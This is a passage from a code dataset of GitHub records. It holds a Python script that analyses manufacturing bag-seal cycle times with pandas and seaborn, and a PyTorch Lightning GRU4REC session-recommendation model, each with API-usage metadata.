"line_number": 93, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 208, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 209, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 217, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 217, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 218, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 223, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 223, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.K_1", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pygame.K_2", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 322, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 322, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 323, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 330, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 330, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 331, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 342, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 342, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 343, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 351, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 358, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 358, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 359, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 404, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 410, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 410, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 411, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 424, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 424, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 425, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 429, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 437, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 437, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 438, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 444, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 463, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 463, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 464, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 516, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 516, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 517, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 536, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 536, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 537, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 544, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 544, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 545, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 549, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 556, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 556, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 557, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 604, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 604, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 605, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 617, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 617, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 618, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 622, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 630, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 630, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 631, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 654, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 654, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 655, "usage_type": "call"}, {"api_name": "pygame.K_1", "line_number": 700, "usage_type": "attribute"}, {"api_name": "pygame.K_2", "line_number": 704, "usage_type": "attribute"}, {"api_name": "pygame.K_3", "line_number": 708, "usage_type": "attribute"}, {"api_name": "pygame.K_4", "line_number": 712, "usage_type": "attribute"}, {"api_name": "pygame.K_5", "line_number": 716, "usage_type": "attribute"}, {"api_name": "pygame.K_6", "line_number": 720, "usage_type": "attribute"}]}
+{"seq_id": "15728272050", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 1 14:56:00 2023\n\n@author: Ryan.Larson\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport statsmodels.stats.api as sms\nimport resin_ttest_experiments as rtt\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.cbook import boxplot_stats\n\n\nkeys = [\"green\", \"orange\", \"pink\", \"red\", \"purple\", \"brown\"]\n\ndef step_1():\n file_list = [\"green.csv\", \"orange.csv\", \"pink.csv\", \"red.csv\", \"purple.csv\", \"brown.csv\"]\n \n mold_dfs = {key: None for key in keys}\n \n \n dropcols = [\"Leak Time\", \"Leak Count\", \"Parts Count\", \"Weekly Count\",\n \"Monthly Count\", \"Trash Count\", \"Lead\", \"Assistant 1\", \"Assistant 2\",\n \"Assistant 3\"]\n \n \n for file in file_list:\n color = file.replace(\".csv\",\"\")\n df = pd.read_csv(file)\n \n # Deal with time column\n df[\"time\"] = pd.to_datetime(df[\"time\"])\n df[\"Date\"] = pd.to_datetime(df[\"time\"]).dt.date\n df.drop(\"time\",axis=1,inplace=True)\n first_column = df.pop(\"Date\")\n df.insert(0,\"Date\", first_column)\n \n for col in dropcols:\n df = df.drop(col,axis=1)\n df = df.dropna(how=\"all\")\n for column in df.columns:\n df = df[df[column] != 0]\n \n mold_dfs[color] = df\n \n df.to_csv(\"{}2.csv\".format(color),index=False)\n # df = df.dropna(axis=0)\n # df.to_csv(bag, index=False)\n \n return mold_dfs\n \n\ndef step_2():\n \"\"\"\n \n\n Returns\n -------\n None.\n\n \"\"\"\n file_list = [\"green2.csv\", \"orange2.csv\", \"pink2.csv\", \"red2.csv\", \"purple2.csv\", \"brown2.csv\"]\n \n for i,file in enumerate(file_list):\n if i == 0:\n df_all = pd.read_csv(file)\n else:\n df = pd.read_csv(file)\n df_all = pd.concat([df_all, df], axis=0, ignore_index=True)\n \n df_all.dropna(axis=0,inplace=True)\n \n return df_all\n\n\ndef filter_saturated(df):\n df = df[df[\"Layup Time\"] != 276]\n df = df[df[\"Layup Time\"] != 275]\n df = df[df[\"Close Time\"] != 90]\n df = df[df[\"Resin Time\"] != 180]\n df.drop_duplicates(inplace=True)\n return df\n \n # mold_dfs = {key: None for key in keys}\n \n # for file in file_list:\n # color = file.replace(\"2.csv\",\"\")\n # df = pd.read_csv(file)\n # df = df[df[\"Layup Time\"] != 276]\n # df = df[df[\"Layup Time\"] != 275]\n # df = df[df[\"Close Time\"] != 90]\n # df = df[df[\"Resin Time\"] != 180]\n \n # # Remove duplicates\n # df.drop_duplicates(inplace=True)\n \n # mold_dfs[color] = df\n \n # df.to_csv(\"{}3.csv\".format(color),index=False)\n \n \n# alldata = pd.concat(frames)\n\n# feature_vals = list(alldata[\"Bag\"].unique())\n# n_feature_vals = len(feature_vals)\n\n# df_features = [alldata.where(alldata[\"Bag\"] == feature_val) for feature_val in feature_vals]\n# df_features = [df_feature.dropna(axis=0) for df_feature in df_features]\n\n\n# # rtt.oneway_anova(df_features, \"Cycle Time\")\n\n# rtt.find_stat_difference_2group(df_features[0], df_features[1], \"Resin Time\")\n# # rtt.find_stat_difference_2group(df_features[0], df_features[1], \"Cycle Time\")\n\n\nif __name__ == \"__main__\":\n # mold_dfs = step_1()\n df_all = step_2()\n \n df10 = df_all[df_all[\"Bag\"]==10.0]\n df11 = df_all[df_all[\"Bag\"]==11.0]\n df12 = df_all[df_all[\"Bag\"]==12.0]\n df13 = df_all[df_all[\"Bag\"]==13.0]\n df14 = df_all[df_all[\"Bag\"]==14.0]\n df15 = df_all[df_all[\"Bag\"]==15.0]\n df16 = df_all[df_all[\"Bag\"]==16.0]\n \n df10_filtered = filter_saturated(df10)\n df11_filtered = filter_saturated(df11)\n df12_filtered = filter_saturated(df12)\n df13_filtered = filter_saturated(df13)\n df14_filtered = filter_saturated(df14)\n df15_filtered = filter_saturated(df15)\n df16_filtered = filter_saturated(df16)\n df_all_filtered = filter_saturated(df_all)\n \n df10_no_outliers = df10_filtered.copy()\n df11_no_outliers = df11_filtered.copy()\n df12_no_outliers = df12_filtered.copy()\n df13_no_outliers = df13_filtered.copy()\n df14_no_outliers = df14_filtered.copy()\n df15_no_outliers = df15_filtered.copy()\n df16_no_outliers = df16_filtered.copy()\n \n ## Filter out outliers for each bag ##\n df_no_outliers_list = [df10_no_outliers, df11_no_outliers, df12_no_outliers, df13_no_outliers, df14_no_outliers, df15_no_outliers, df16_no_outliers]\n \n for i,df in enumerate(df_no_outliers_list):\n layup_stats = boxplot_stats(list(df[\"Layup Time\"]))[0]\n resin_stats = boxplot_stats(list(df[\"Resin Time\"]))[0]\n close_stats = boxplot_stats(list(df[\"Close Time\"]))[0]\n cycle_stats = boxplot_stats(list(df[\"Cycle Time\"]))[0]\n \n layup_conditions = [(df[\"Layup Time\"] > layup_stats[\"whishi\"]) | (df[\"Layup Time\"] < layup_stats[\"whislo\"])]\n close_conditions = [(df[\"Close Time\"] > close_stats[\"whishi\"]) | (df[\"Close Time\"] < close_stats[\"whislo\"])]\n resin_conditions = [(df[\"Resin Time\"] > resin_stats[\"whishi\"]) | (df[\"Resin Time\"] < resin_stats[\"whislo\"])]\n cycle_conditions = [(df[\"Cycle Time\"] > cycle_stats[\"whishi\"]) | (df[\"Cycle Time\"] < cycle_stats[\"whislo\"])]\n \n df[\"Layup Outlier\"] = np.transpose(np.where(layup_conditions, True, False))\n df[\"Close Outlier\"] = np.transpose(np.where(close_conditions, True, False))\n df[\"Resin Outlier\"] = np.transpose(np.where(resin_conditions, True, False))\n df[\"Cycle Outlier\"] = np.transpose(np.where(cycle_conditions, True, False))\n \n \n df_all_no_outliers = pd.concat([df10_no_outliers, df11_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df12_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df13_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df14_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df15_no_outliers])\n df_all_no_outliers = pd.concat([df_all_no_outliers, df16_no_outliers])\n \n df_all_layup_filtered = df_all_no_outliers[df_all_no_outliers[\"Layup Outlier\"] == False]\n df_all_close_filtered = df_all_no_outliers[df_all_no_outliers[\"Close Outlier\"] == False]\n df_all_resin_filtered = df_all_no_outliers[df_all_no_outliers[\"Resin Outlier\"] == False]\n df_all_cycle_filtered = df_all_no_outliers[df_all_no_outliers[\"Cycle Outlier\"] == False]\n \n sns.set(rc={\"figure.dpi\":300, \"figure.figsize\":(15.0, 8.27)})\n sns.set_style(\"whitegrid\")\n palette_str = \"Paired\"\n \n ### Bag Days as x\n # Layup Time\n plt.figure()\n sns.relplot(data=df_all_layup_filtered, x=\"Bag Days\", y=\"Layup Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Layup Time\")\n \n # Close Time\n plt.figure()\n sns.relplot(data=df_all_close_filtered, x=\"Bag Days\", y=\"Close Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Close Time\")\n \n # Resin Time\n plt.figure()\n sns.relplot(data=df_all_resin_filtered, x=\"Bag Days\", y=\"Resin Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Resin Time\")\n \n # Cycle Time\n plt.figure()\n sns.relplot(data=df_all_cycle_filtered, x=\"Bag Days\", y=\"Cycle Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Cycle Time\")\n \n ### Bag Cycles as x\n # Layup Time\n plt.figure()\n sns.relplot(data=df_all_layup_filtered, x=\"Bag Cycles\", y=\"Layup Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Layup Time\")\n \n # Close Time\n plt.figure()\n sns.relplot(data=df_all_close_filtered, x=\"Bag Cycles\", y=\"Close Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Close Time\")\n \n # Resin Time\n plt.figure()\n sns.relplot(data=df_all_resin_filtered, x=\"Bag Cycles\", y=\"Resin Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Resin Time\")\n \n # Cycle Time\n plt.figure()\n sns.relplot(data=df_all_cycle_filtered, x=\"Bag Cycles\", y=\"Cycle Time\", hue=\"Bag\", palette=palette_str)\n plt.title(\"Age Effects on Cycle Time\")\n \n ### Boxplot by bag for overall differences\n # Layup Time\n plt.figure()\n ax = sns.boxplot(data=df_all_layup_filtered, x=\"Bag\", y=\"Layup Time\", palette=palette_str)\n medians = df_all_layup_filtered.groupby(['Bag'])['Layup Time'].median().values\n nobs = df_all_layup_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n # Close Time\n plt.figure()\n ax = sns.boxplot(data=df_all_close_filtered, x=\"Bag\", y=\"Close Time\", palette=palette_str)\n medians = df_all_close_filtered.groupby(['Bag'])['Close Time'].median().values\n nobs = df_all_close_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n # Resin Time\n plt.figure()\n ax = sns.boxplot(data=df_all_resin_filtered, x=\"Bag\", y=\"Resin Time\", palette=palette_str)\n medians = df_all_resin_filtered.groupby(['Bag'])['Resin Time'].median().values\n nobs = df_all_resin_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n # Cycle Time\n plt.figure()\n ax = sns.boxplot(data=df_all_cycle_filtered, x=\"Bag\", y=\"Cycle Time\", palette=palette_str)\n medians = df_all_cycle_filtered.groupby(['Bag'])['Cycle Time'].median().values\n nobs = df_all_cycle_filtered['Bag'].value_counts().values\n nobs = [str(x) for x in nobs.tolist()]\n nobs = [\"n: \" + i for i in nobs]\n pos = range(len(nobs))\n for tick,label in zip(pos,ax.get_xticklabels()):\n ax.text(pos[tick],\n medians[tick] + 0.04,\n nobs[tick],\n horizontalalignment='center',\n size='small',\n color='w',\n weight='semibold')\n \n ", "repo_name": "rockwell-window-wells/random-projects", "sub_path": "Silicone_Seals/bag_seal_cycle_analysis.py", "file_name": "bag_seal_cycle_analysis.py", "file_ext": "py", "file_size_in_byte": 10876, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.cbook.boxplot_stats", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 169, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 173, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 177, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 184, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "seaborn.relplot", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 249, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "seaborn.boxplot", "line_number": 284, "usage_type": "call"}]}
+{"seq_id": "12713685719", "text": "import math\nimport warnings\nfrom functools import partial\n\nimport pytorch_lightning as pl\nimport torch\nfrom torch import concat, nn, tensor\n\nfrom src.shared.evaluate import validate_batch_per_timestamp\nfrom src.shared.loss import (bce_loss, bpr_max_loss, calc_loss,\n sampled_softmax_loss)\n\n\ndef sparse_output(item_lookup, bias_lookup, output, items_to_predict):\n embeddings = item_lookup(items_to_predict)\n logits = torch.matmul(embeddings, output.t())\n bias = bias_lookup(items_to_predict).squeeze(1)\n return bias + logits.t()\n\n\ndef dense_output(linear_layer, output, items_to_predict):\n return linear_layer(output)[:, items_to_predict.view(-1)]\n\n\ndef clean_state(curr_state, keep_state):\n return curr_state * keep_state\n\nclass GRU4REC(pl.LightningModule):\n\n def __init__(self,\n hidden_size,\n dropout_rate,\n num_items,\n batch_size,\n sampling_style=\"batchwise\",\n topk_sampling=False,\n topk_sampling_k=1000,\n learning_rate=0.001,\n num_layers=1,\n loss='bce',\n bpr_penalty=None,\n optimizer='adagrad',\n output_bias=False,\n share_embeddings=True,\n original_gru=False,\n final_activation=True):\n super(GRU4REC, self).__init__()\n self.num_items = num_items\n self.learning_rate = learning_rate\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.dropout_hidden = dropout_rate\n self.batch_size = batch_size\n self.sampling_style = sampling_style\n if sampling_style == \"eventwise\":\n warnings.warn(\"Warning eventwise is not supported and is set to sessionwise ...\")\n self.sampling_style = sampling_style\n self.output_bias = output_bias\n self.share_embeddings = share_embeddings\n self.original_gru = original_gru\n\n if original_gru:\n warnings.warn(\"Warning gru original cannot share input and output embeddings, share embedding is set to False\")\n self.share_embeddings = False\n\n if output_bias and share_embeddings:\n self.item_embedding = nn.Embedding(num_items + 1, hidden_size + 1, padding_idx=0)\n elif self.original_gru:\n self.item_embedding = nn.Embedding(num_items + 1, 3 * hidden_size, padding_idx=0)\n else:\n self.item_embedding = nn.Embedding(num_items + 1, hidden_size, padding_idx=0)\n\n if share_embeddings:\n self.output_embedding = self.item_embedding\n elif (not share_embeddings) and output_bias:\n self.output_embedding = nn.Embedding(num_items + 1, hidden_size + 1, padding_idx=0)\n else:\n self.output_embedding = nn.Embedding(num_items + 1, hidden_size, padding_idx=0)\n\n torch.nn.init.xavier_uniform_(self.item_embedding.weight.data, gain=1 / math.sqrt(6))\n torch.nn.init.xavier_uniform_(self.output_embedding.weight.data, gain=1 / math.sqrt(6))\n\n self.gru = nn.GRU(int(3 * self.hidden_size) if self.original_gru else self.hidden_size,\n self.hidden_size,\n self.num_layers,\n dropout=self.dropout_hidden,\n batch_first=True)\n if final_activation:\n self.final_activation = nn.ELU(0.5)\n else:\n self.final_activation = nn.Identity()\n\n if self.original_gru:\n self.gru.weight_ih_l0 = nn.Parameter(data=torch.eye(3 * self.hidden_size), requires_grad=False)\n self.register_buffer('current_state', torch.zeros([num_layers, batch_size, hidden_size], device=self.device))\n self.register_buffer('loss_mask', torch.ones(1, self.batch_size, device=self.device))\n self.register_buffer('bias_ones', torch.ones([self.batch_size, 1, 1]))\n self.loss_fn = loss\n if self.loss_fn == 'bce':\n self.loss = bce_loss\n elif self.loss_fn == 'ssm':\n self.loss = sampled_softmax_loss\n elif self.loss_fn == 'bpr-max':\n if bpr_penalty is not None:\n self.loss = partial(bpr_max_loss, bpr_penalty)\n else:\n raise ValueError('bpr_penalty must be provided for bpr_max loss')\n else:\n raise ValueError('Loss function not supported')\n\n self.topk_sampling = topk_sampling\n self.topk_sampling_k = topk_sampling_k\n self.optimizer = optimizer\n self.save_hyperparameters()\n\n def forward(self, item_indices, in_state, keep_state):\n embedded = self.item_embedding(item_indices.unsqueeze(1))\n embedded = embedded[:, :, :-1] if self.output_bias and self.share_embeddings else embedded\n in_state = clean_state(in_state, keep_state)\n gru_output, out_state = self.gru(embedded, in_state)\n scores = concat([gru_output, self.bias_ones], dim=-1) if self.output_bias else gru_output\n return scores, out_state\n\n def training_step(self, batch, _):\n x_hat, c_state = self.forward(batch[\"clicks\"], self.current_state, batch[\"keep_state\"])\n\n self.current_state = c_state.detach()\n train_loss = calc_loss(self.loss, x_hat, batch[\"labels\"], batch[\"uniform_negatives\"], batch[\"in_batch_negatives\"],\n batch[\"mask\"], self.output_embedding, self.sampling_style, self.final_activation,\n self.topk_sampling, self.topk_sampling_k, self.device)\n\n self.log(\"train_loss\", train_loss)\n\n return train_loss\n\n def validation_step(self, batch, _batch_idx):\n x_hat, self.current_state = self.forward(batch[\"clicks\"], self.current_state, batch[\"keep_state\"])\n cut_offs = tensor([5, 10, 20], device=self.device)\n recall, mrr = validate_batch_per_timestamp(batch, x_hat, self.output_embedding, cut_offs)\n test_loss = calc_loss(self.loss, x_hat, batch[\"labels\"], batch[\"uniform_negatives\"], batch[\"in_batch_negatives\"],\n batch[\"mask\"], self.output_embedding, self.sampling_style, self.final_activation,\n self.topk_sampling, self.topk_sampling_k, self.device)\n for i, k in enumerate(cut_offs.tolist()):\n self.log(f'recall_cutoff_{k}', recall[i])\n self.log(f'mrr_cutoff_{k}', mrr[i])\n self.log('test_seq_len', x_hat.shape[1])\n self.log('test_loss', test_loss)\n\n def configure_optimizers(self):\n if self.optimizer == 'adam':\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n elif self.optimizer == 'adagrad':\n optimizer = torch.optim.Adagrad(self.parameters(), lr=self.learning_rate)\n else:\n raise ValueError('Optimizer not supported, please use adam or adagrad')\n return optimizer\n", "repo_name": "otto-de/TRON", "sub_path": "src/gru4rec/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 6959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 44, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.matmul", "line_number": 16, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 28, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 56, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.GRU", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.ELU", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Identity", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.ones", 